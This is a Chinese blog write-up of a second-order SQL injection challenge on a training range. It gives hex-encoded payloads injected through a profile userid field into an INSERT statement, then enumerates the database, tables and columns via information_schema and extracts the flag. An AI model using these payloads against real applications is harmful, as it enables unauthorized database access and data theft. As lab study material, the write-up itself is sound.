基于掌控安全靶场之sql二次注入

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任


目录

1.打开靶场

2.分析靶场   

1.构造pyload测试:

2.pyload:

3.查询表中数据

4.查询fl4g

总结

首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+


1.打开靶场

2.分析靶场   

首先登录发现需要进行注册,因为提示为sql二次注入所以猜测需要登录才能注入,于是注册一个账号密码登录,登录后发现有修改个人信息的模块所以猜测这里就是注入点。其中有一个userid,我们猜测这个就是注入点,但是输入字符提示只能输入数字,所以我们将注入语句进行16进制转化后注入,打开登录日志发现有表如下,这表有查询修改插入的功能,当我们登录时数据进行插入,所以第一步为检测inster插入字段数为多少


1.构造pyload测试:

,1’,1,1,1) -- qwe 转换为16进制

解释:

-- qwe =--+

注入发现字段数为4所以接下来构建查询数据库表等语句


2.pyload:

1’,(select database()),1,1) -- qwe  

查询得到一个表ctf

pyload:

1',(select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) -- qwe


3.查询表中数据

Pyload:

1',(select group_concat(column_name) from information_schema.columns where table_name='injectflag'),1,1) -- qwe


4.查询fl4g

Pyload:

1',(select fl4g from injectflag limit 1,1),1,1) -- qwe


总结

首先二次注入难以使用工具sqlmap,需要登录才能注入,例如sql-labs靶场24关(比这个简单),首先确认inster插入字段数,然后就可以常规手法注入。其中-- qwe为--+

                            

(需要源代码联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全瞭望Sec

感谢您的打赏,您的支持让我更加

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值